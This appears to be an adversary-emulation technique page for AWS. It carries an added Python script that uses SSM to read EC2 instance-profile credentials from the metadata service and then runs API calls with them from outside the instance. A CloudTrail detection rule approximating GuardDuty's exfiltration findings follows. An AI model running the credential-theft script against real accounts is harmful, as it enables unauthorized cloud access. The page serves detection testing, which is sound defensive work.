Steal EC2 Instance Credentials
Tags: slow, idempotent
Platform: AWS
MITRE ATT&CK Tactics
- Credential Access
Description
Simulates the theft of EC2 instance credentials, i.e. the temporary credentials of the instance profile role, from the Instance Metadata Service (IMDS).
Warm-up:
- Create the prerequisite EC2 instance and VPC (takes a few minutes).
Detonation:
- Execute an SSM command on the instance that retrieves the instance profile's temporary credentials from IMDS
- Use these credentials locally (i.e. from outside the instance) to run the following API calls:
  - sts:GetCallerIdentity
  - ec2:DescribeInstances
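The two detonation steps, written out as an added example (this is illustrative code, not Stratus Red Team's own implementation). It assumes a boto3 session with ssm:SendCommand and ssm:GetCommandInvocation permissions, an instance ID and region passed on the command line, and an instance that is SSM-managed; the SSM output embedded as SAMPLE_SSM_OUTPUT is a constructed stand-in for what IMDS returns, using the AWS documentation placeholder key.

```python
import json
import sys
import time

IMDS = "http://169.254.169.254"

# Shell script pushed to the instance through SSM (AWS-RunShellScript). It uses the
# IMDSv2 token flow, so it works whether the instance enforces IMDSv2 or still allows v1.
IMDS_CREDENTIAL_SCRIPT = f"""\
TOKEN=$(curl -s -X PUT "{IMDS}/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 60")
ROLE=$(curl -s -H "X-aws-ec2-metadata-token: $TOKEN" "{IMDS}/latest/meta-data/iam/security-credentials/")
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" "{IMDS}/latest/meta-data/iam/security-credentials/$ROLE"
"""

# Constructed sample of the command's StandardOutputContent: the IMDS credential document.
# Key material is the AWS documentation placeholder, not a real key.
SAMPLE_SSM_OUTPUT = """{
  "Code" : "Success",
  "LastUpdated" : "2024-05-01T10:00:00Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIAIOSFODNN7EXAMPLE",
  "SecretAccessKey" : "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
  "Token" : "IQoJb3JpZ2luX2VjEXAMPLETOKEN",
  "Expiration" : "2024-05-01T16:00:00Z"
}
"""


def parse_imds_credentials(output):
    """Turn the IMDS credential document into the keyword arguments boto3.Session expects.
    Raises ValueError when the document is not a successful credential response."""
    doc = json.loads(output)
    if doc.get("Code") != "Success":
        raise ValueError(f"unexpected IMDS response code: {doc.get('Code')!r}")
    return {
        "aws_access_key_id": doc["AccessKeyId"],
        "aws_secret_access_key": doc["SecretAccessKey"],
        "aws_session_token": doc["Token"],
    }


def fetch_credentials_via_ssm(ssm, instance_id, timeout=90):
    """Run the IMDS script on the instance through SSM and return the command's stdout."""
    cmd = ssm.send_command(
        InstanceIds=[instance_id],
        DocumentName="AWS-RunShellScript",
        Parameters={"commands": IMDS_CREDENTIAL_SCRIPT.splitlines()},
    )
    command_id = cmd["Command"]["CommandId"]
    deadline = time.time() + timeout
    while time.time() < deadline:
        time.sleep(2)  # the invocation record is not queryable immediately after send_command
        inv = ssm.get_command_invocation(CommandId=command_id, InstanceId=instance_id)
        if inv["Status"] in ("Success", "Failed", "Cancelled", "TimedOut"):
            if inv["Status"] != "Success":
                raise RuntimeError(f"SSM command {inv['Status']}: {inv.get('StandardErrorContent')}")
            return inv["StandardOutputContent"]
    raise TimeoutError(f"SSM command {command_id} did not finish within {timeout}s")


def use_stolen_credentials(creds, region):
    """Use the exfiltrated credentials from this machine: the calls GuardDuty should flag."""
    import boto3  # imported here so the pure helpers above stay importable without boto3

    session = boto3.Session(region_name=region, **creds)
    identity = session.client("sts").get_caller_identity()
    reservations = session.client("ec2").describe_instances()["Reservations"]
    return identity["Arn"], sum(len(r["Instances"]) for r in reservations)


def main(instance_id, region):
    import boto3

    ssm = boto3.Session(region_name=region).client("ssm")
    creds = parse_imds_credentials(fetch_credentials_via_ssm(ssm, instance_id))
    arn, count = use_stolen_credentials(creds, region)
    print(f"credentials of {arn} used from outside the instance; {count} instances visible")


if __name__ == "__main__":
    main(sys.argv[1], sys.argv[2])  # usage: python steal_creds.py i-0123456789abcdef0 us-east-1
```

The credentials expire at the `Expiration` timestamp in the document (typically about six hours out), so the local calls must happen before then; GuardDuty keys on where the credentials are used from, not on what they do, so even the read-only calls above are enough to trigger the finding.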
Instructions
Detection
GuardDuty provides two findings to identify stolen EC2 instance credentials; both rely on CloudTrail, so only API calls that CloudTrail logs can trigger them.
- InstanceCredentialExfiltration.OutsideAWS identifies EC2 instance credentials used from an IP address outside AWS.
- InstanceCredentialExfiltration.InsideAWS identifies EC2 instance credentials used from inside AWS but from an account other than the one the EC2 instance belongs to.
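The same idea as the two GuardDuty findings, reduced to a rule over CloudTrail records, as an added example that is not part of the original page or of GuardDuty's logic. It assumes the defender knows each instance's legitimate source addresses (from ec2:DescribeInstances, plus the NAT gateway EIP if the instance egresses through one) and has the EC2 prefixes from ip-ranges.json; both are constructed stand-ins here, and the sample CloudTrail records are constructed too. The only fact it relies on is that credentials served by IMDS belong to a role session named after the instance ID, which is why `principalId` ends in `:i-...`.

```python
import ipaddress

# Constructed sample: addresses the instance legitimately calls from, as ec2:DescribeInstances
# reports them. If the instance egresses through a NAT gateway, the gateway's EIP belongs here too.
INSTANCE_IPS = {"i-0abc123def4567890": {"203.0.113.10"}}

# Constructed stand-in for the EC2 prefixes published in ip-ranges.json; load the real list in production.
AWS_EC2_PREFIXES = [ipaddress.ip_network("198.51.100.0/24")]


def instance_role_record(event_name, source_ip, event_source="ec2.amazonaws.com",
                         instance_id="i-0abc123def4567890", account="123456789012"):
    """Build a minimal CloudTrail record for a call made with instance-profile credentials."""
    return {
        "eventSource": event_source,
        "eventName": event_name,
        "sourceIPAddress": source_ip,
        "recipientAccountId": account,
        "userIdentity": {
            "type": "AssumedRole",
            # EC2 issues the credentials under a role session named after the instance.
            "principalId": f"AROAEXAMPLEROLEID:{instance_id}",
            "arn": f"arn:aws:sts::{account}:assumed-role/stratus-ec2-role/{instance_id}",
            "accountId": account,
            "sessionContext": {"sessionIssuer": {"type": "Role"}, "ec2RoleDelivery": "2.0"},
        },
    }


# Constructed sample events: the instance itself, the operator's laptop, another EC2 host,
# and an ordinary IAM user call that the rule must ignore.
SAMPLE_EVENTS = [
    instance_role_record("DescribeInstances", "203.0.113.10"),
    instance_role_record("GetCallerIdentity", "192.0.2.55", "sts.amazonaws.com"),
    instance_role_record("DescribeInstances", "198.51.100.9"),
    {"eventSource": "sts.amazonaws.com", "eventName": "GetCallerIdentity", "sourceIPAddress": "192.0.2.55",
     "userIdentity": {"type": "IAMUser", "principalId": "AIDAEXAMPLEUSERID"}},
]


def instance_id_from_identity(user_identity):
    """Return the instance ID when the caller is an instance-profile role session, else None."""
    if user_identity.get("type") != "AssumedRole":
        return None
    session_name = user_identity.get("principalId", "").split(":", 1)[-1]
    return session_name if session_name.startswith("i-") else None


def classify(record):
    """'expected' when the instance's own address made the call, 'inside_aws' when another AWS
    address did (approximating InstanceCredentialExfiltration.InsideAWS), 'outside_aws' otherwise
    (approximating InstanceCredentialExfiltration.OutsideAWS), None when the credentials are not
    instance credentials or the call was made on the caller's behalf by an AWS service."""
    instance_id = instance_id_from_identity(record.get("userIdentity", {}))
    if instance_id is None:
        return None
    src = record.get("sourceIPAddress", "")
    try:
        ip = ipaddress.ip_address(src)
    except ValueError:
        return None  # e.g. "ec2.amazonaws.com" when an AWS service makes the call
    if src in INSTANCE_IPS.get(instance_id, set()):
        return "expected"
    if any(ip in net for net in AWS_EC2_PREFIXES):
        return "inside_aws"
    return "outside_aws"


def findings(records):
    """Return (eventName, sourceIPAddress, verdict) for every call that used instance
    credentials from somewhere other than the instance itself."""
    out = []
    for record in records:
        verdict = classify(record)
        if verdict not in (None, "expected"):
            out.append((record["eventName"], record["sourceIPAddress"], verdict))
    return out


if __name__ == "__main__":
    for name, ip, verdict in findings(SAMPLE_EVENTS):
        print(f"{verdict}: {name} from {ip}")
```

Two caveats a practitioner should keep in mind: an instance with no known addresses in `INSTANCE_IPS` is always flagged, which is the safe default but noisy for auto-scaled fleets, and a source IP inside an AWS prefix only tells you the call came from AWS, not from which account, so this rule is broader than the InsideAWS finding, which is specific to a different account.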
See also: Known detection bypasses.